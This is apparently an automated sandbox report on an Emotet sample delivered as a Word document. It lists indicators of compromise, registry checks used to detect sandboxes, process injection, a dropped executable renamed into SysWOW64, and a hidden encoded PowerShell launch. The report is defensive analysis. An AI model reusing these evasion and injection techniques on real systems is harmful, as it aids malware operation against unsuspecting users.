Analysis
max time kernel: 28s
resource: win10v191014
submitted: 21-01-2020 19:59
General
Malware Config
Extracted
Extracted
emotet
Signatures
Suspicious use of WriteProcessMemory 3 IoCs
description | pid | Process | procid_target
PID 3648 wrote to memory of 4680 | 3648 | Powershell.exe | 80
PID 4680 wrote to memory of 3940 | 4680 | 497.exe | 81
PID 3772 wrote to memory of 4264 | 3772 | devicesspace.exe | 83
Executes dropped EXE 4 IoCs
pid | Process
4680 | 497.exe
3940 | 497.exe
3772 | devicesspace.exe
4264 | devicesspace.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
Suspicious use of SetWindowsHookEx 5 IoCs
pid | Process
4972 | WINWORD.EXE
4680 | 497.exe
3940 | 497.exe
3772 | devicesspace.exe
4264 | devicesspace.exe
Process spawned unexpected child process 1 IoCs
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3648 | 5088 | Powershell.exe | 73
Suspicious use of AdjustPrivilegeToken 1 IoCs
description | pid | Process
Token: SeDebugPrivilege | 3648 | Powershell.exe
Drops file in System32 directory 1 IoCs
description | ioc | Process
File renamed | C:\Users\Admin\497.exe => C:\Windows\SysWOW64\devicesspace.exe | 497.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid | Process
4972 | WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid | Process
3648 | Powershell.exe
Suspicious behavior: EmotetMutantsSpam 2 IoCs
pid | Process
3940 | 497.exe
4264 | devicesspace.exe
Processes
WINWORD.EXE
  Path: C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4c5b70ce5e0c105f0e22164fb8889b602261d94c50fae8caff0ace7e780f7367.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious use of SetWindowsHookEx
  - Suspicious behavior: AddClipboardFormatListener
  PID: 4972

Powershell.exe
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
  Command line: Powershell -w hidden -en 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
  - Suspicious use of WriteProcessMemory
  - Process spawned unexpected child process
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  PID: 3648

  497.exe
    Path: C:\Users\Admin\497.exe
    Command line: "C:\Users\Admin\497.exe"
    - Suspicious use of WriteProcessMemory
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID: 4680

    497.exe
      Path: C:\Users\Admin\497.exe
      Command line: --14180dd0
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      - Drops file in System32 directory
      - Suspicious behavior: EmotetMutantsSpam
      PID: 3940

devicesspace.exe
  Path: C:\Windows\SysWOW64\devicesspace.exe
  Command line: "C:\Windows\SysWOW64\devicesspace.exe"
  - Suspicious use of WriteProcessMemory
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID: 3772

  devicesspace.exe
    Path: C:\Windows\SysWOW64\devicesspace.exe
    Command line: --379237bb
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    - Suspicious behavior: EmotetMutantsSpam
    PID: 4264